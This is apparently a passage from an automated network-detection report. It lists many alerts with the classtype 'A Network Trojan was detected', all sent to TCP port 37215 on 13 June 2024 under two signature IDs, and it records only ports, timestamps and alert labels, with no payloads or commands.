              SID:2829579
              Source Port:40138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167467
              SID:2835222
              Source Port:53166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610400
              SID:2829579
              Source Port:58748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.459090
              SID:2829579
              Source Port:59830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696463
              SID:2829579
              Source Port:52928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153162
              SID:2829579
              Source Port:51778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408705
              SID:2835222
              Source Port:44362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841675
              SID:2835222
              Source Port:48608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508955
              SID:2835222
              Source Port:40500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013992
              SID:2829579
              Source Port:48416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076969
              SID:2829579
              Source Port:38734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992023
              SID:2829579
              Source Port:34006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254094
              SID:2835222
              Source Port:37986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092180
              SID:2829579
              Source Port:45216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.936231
              SID:2835222
              Source Port:35582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156121
              SID:2829579
              Source Port:54248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012643
              SID:2829579
              Source Port:54526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.753380
              SID:2835222
              Source Port:35214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156201
              SID:2835222
              Source Port:35790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087840
              SID:2835222
              Source Port:57222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177813
              SID:2829579
              Source Port:48450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.634279
              SID:2835222
              Source Port:59250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988290
              SID:2829579
              Source Port:47308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.301401
              SID:2835222
              Source Port:53130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166122
              SID:2829579
              Source Port:60404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457445
              SID:2835222
              Source Port:33414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456057
              SID:2829579
              Source Port:52338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545783
              SID:2835222
              Source Port:34838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043477
              SID:2835222
              Source Port:57774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245621
              SID:2835222
              Source Port:46204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087170
              SID:2835222
              Source Port:50804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416877
              SID:2835222
              Source Port:42636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011740
              SID:2829579
              Source Port:59836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079967
              SID:2835222
              Source Port:36948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419891
              SID:2835222
              Source Port:47152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154370
              SID:2829579
              Source Port:51576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247650
              SID:2835222
              Source Port:39680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610220
              SID:2835222
              Source Port:43142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303115
              SID:2835222
              Source Port:54024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173077
              SID:2835222
              Source Port:39926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503501
              SID:2829579
              Source Port:52698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675164
              SID:2835222
              Source Port:39182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831839
              SID:2829579
              Source Port:35596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401051
              SID:2829579
              Source Port:60362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128204
              SID:2829579
              Source Port:53462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954026
              SID:2835222
              Source Port:36784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238651
              SID:2835222
              Source Port:33980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099481
              SID:2829579
              Source Port:59766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.843657
              SID:2829579
              Source Port:38120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153636
              SID:2835222
              Source Port:57622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227358
              SID:2835222
              Source Port:53824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303359
              SID:2835222
              Source Port:52664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093081
              SID:2829579
              Source Port:41142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123630
              SID:2835222
              Source Port:51450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440920
              SID:2835222
              Source Port:40632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450511
              SID:2829579
              Source Port:38292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975650
              SID:2835222
              Source Port:46986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977755
              SID:2829579
              Source Port:42700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307570
              SID:2835222
              Source Port:60264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074400
              SID:2835222
              Source Port:38766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152185
              SID:2835222
              Source Port:34794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833563
              SID:2829579
              Source Port:46536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.507933
              SID:2835222
              Source Port:35858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273261
              SID:2835222
              Source Port:59642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108564
              SID:2835222
              Source Port:53062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.910148
              SID:2835222
              Source Port:51804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752136
              SID:2835222
              Source Port:56680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302725
              SID:2829579
              Source Port:47850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407205
              SID:2835222
              Source Port:58004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417634
              SID:2835222
              Source Port:34306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157762
              SID:2835222
              Source Port:48320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995055
              SID:2829579
              Source Port:51084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480229
              SID:2835222
              Source Port:35510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181698
              SID:2835222
              Source Port:55826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350465
              SID:2829579
              Source Port:52378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831522
              SID:2829579
              Source Port:55292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551957
              SID:2835222
              Source Port:39976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994658
              SID:2835222
              Source Port:33972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305791
              SID:2829579
              Source Port:32912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347597
              SID:2829579
              Source Port:54706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040366
              SID:2829579
              Source Port:60908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127335
              SID:2829579
              Source Port:58184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.212434
              SID:2835222
              Source Port:51580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612949
              SID:2835222
              Source Port:54058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214513
              SID:2829579
              Source Port:43824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507931
              SID:2829579
              Source Port:59418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787157
              SID:2835222
              Source Port:43560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402875
              SID:2829579
              Source Port:58852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727618
              SID:2829579
              Source Port:55582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728669
              SID:2829579
              Source Port:51730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213474
              SID:2835222
              Source Port:60196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669462
              SID:2835222
              Source Port:41240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.784572
              SID:2829579
              Source Port:35994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.726990
              SID:2829579
              Source Port:52352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298202
              SID:2835222
              Source Port:47244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373833
              SID:2829579
              Source Port:45044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834173
              SID:2829579
              Source Port:33030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271127
              SID:2835222
              Source Port:56878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822334
              SID:2829579
              Source Port:39244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545828
              SID:2829579
              Source Port:39260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.949874
              SID:2829579
              Source Port:47914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075630
              SID:2829579
              Source Port:45606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127306
              SID:2835222
              Source Port:44316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106348
              SID:2829579
              Source Port:44136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.054972
              SID:2835222
              Source Port:32940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993327
              SID:2829579
              Source Port:44620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633308
              SID:2829579
              Source Port:39452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.754364
              SID:2829579
              Source Port:43756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216807
              SID:2835222
              Source Port:51660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317599
              SID:2835222
              Source Port:59232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160507
              SID:2829579
              Source Port:54142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027454
              SID:2835222
              Source Port:59592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884814
              SID:2835222
              Source Port:51058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409722
              SID:2829579
              Source Port:51500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570978
              SID:2829579
              Source Port:38818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632749
              SID:2829579
              Source Port:36690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088821
              SID:2835222
              Source Port:54110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868839
              SID:2829579
              Source Port:41952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345559
              SID:2829579
              Source Port:48292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755730
              SID:2835222
              Source Port:33066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885239
              SID:2835222
              Source Port:58388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195706
              SID:2829579
              Source Port:37438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456861
              SID:2829579
              Source Port:42294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276833
              SID:2829579
              Source Port:45514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093854
              SID:2835222
              Source Port:48458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.702465
              SID:2829579
              Source Port:44694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669371
              SID:2835222
              Source Port:47694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.237747
              SID:2829579
              Source Port:56778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090759
              SID:2829579
              Source Port:60300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088278
              SID:2835222
              Source Port:39442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.246193
              SID:2835222
              Source Port:57886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.501879
              SID:2835222
              Source Port:60932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.819878
              SID:2835222
              Source Port:43608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753508
              SID:2829579
              Source Port:42008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.152772
              SID:2829579
              Source Port:46394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676889
              SID:2829579
              Source Port:55392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108194
              SID:2829579
              Source Port:58298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057475
              SID:2829579
              Source Port:37892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196588
              SID:2835222
              Source Port:35132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.570311
              SID:2835222
              Source Port:46958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936607
              SID:2829579
              Source Port:49652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039213
              SID:2829579
              Source Port:37210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274530
              SID:2835222
              Source Port:42850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110826
              SID:2835222
              Source Port:34316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977646
              SID:2829579
              Source Port:42490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.994290
              SID:2829579
              Source Port:55654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975308
              SID:2829579
              Source Port:55580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839383
              SID:2835222
              Source Port:57612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191715
              SID:2829579
              Source Port:45370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.194950
              SID:2829579
              Source Port:56340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199473
              SID:2835222
              Source Port:51378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092305
              SID:2829579
              Source Port:34986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224908
              SID:2835222
              Source Port:47896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677315
              SID:2835222
              Source Port:43606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610012
              SID:2829579
              Source Port:34820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345935
              SID:2835222
              Source Port:47496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303310
              SID:2835222
              Source Port:33386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695630
              SID:2835222
              Source Port:52066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.969477
              SID:2829579
              Source Port:39556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451355
              SID:2829579
              Source Port:47902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.788477
              SID:2829579
              Source Port:47896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676780
              SID:2829579
              Source Port:43400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.455850
              SID:2829579
              Source Port:46198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488056
              SID:2829579
              Source Port:58704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974255
              SID:2835222
              Source Port:56146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356840
              SID:2835222
              Source Port:38624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678958
              SID:2835222
              Source Port:37776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912528
              SID:2829579
              Source Port:39202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992633
              SID:2835222
              Source Port:53734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710502
              SID:2835222
              Source Port:33164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013753
              SID:2829579
              Source Port:33846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027456
              SID:2829579
              Source Port:36838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110354
              SID:2829579
              Source Port:57058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940449
              SID:2835222
              Source Port:57476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438622
              SID:2829579
              Source Port:41590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669606
              SID:2835222
              Source Port:36488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943855
              SID:2835222
              Source Port:45112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824338
              SID:2829579
              Source Port:49112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.935597
              SID:2829579
              Source Port:47144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348831
              SID:2835222
              Source Port:56734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842402
              SID:2829579
              Source Port:57144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457601
              SID:2835222
              Source Port:49814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305206
              SID:2835222
              Source Port:38676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544695
              SID:2835222
              Source Port:48842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872038
              SID:2829579
              Source Port:60820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802338
              SID:2835222
              Source Port:43902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677124
              SID:2835222
              Source Port:33802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174661
              SID:2829579
              Source Port:47342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.910280
              SID:2835222
              Source Port:45364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.212752
              SID:2835222
              Source Port:52830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419463
              SID:2829579
              Source Port:52824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045743
              SID:2835222
              Source Port:42918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210838
              SID:2829579
              Source Port:52866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613431
              SID:2829579
              Source Port:52942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091307
              SID:2835222
              Source Port:51936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545626
              SID:2829579
              Source Port:57772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354241
              SID:2829579
              Source Port:46400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551498
              SID:2835222
              Source Port:60526
              Destination Port:37215
